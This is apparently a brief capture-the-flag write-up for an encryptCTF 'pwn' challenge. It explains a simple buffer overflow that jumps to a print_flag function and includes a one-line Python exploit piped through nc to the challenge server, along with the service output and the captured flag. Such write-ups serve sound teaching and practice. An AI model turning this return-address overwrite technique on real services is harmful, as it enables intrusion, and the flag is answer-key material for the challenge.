Tags: pwn
Rating:
Simple buffer overflow we get the address for print_flag from using objdump, the address is passed at the seg fault and is reversed for the exploit.
`Address of print_flag: 0x080484dd`
Exploit:
`python -c "print 'A'*80 + '\xdd\x84\x04\x08'" | nc 104.154.106.182 1234`
How's the josh?
Your josh is low!
Bye!
`Flag: encryptCTF{L3t5_R4!53_7h3_J05H}`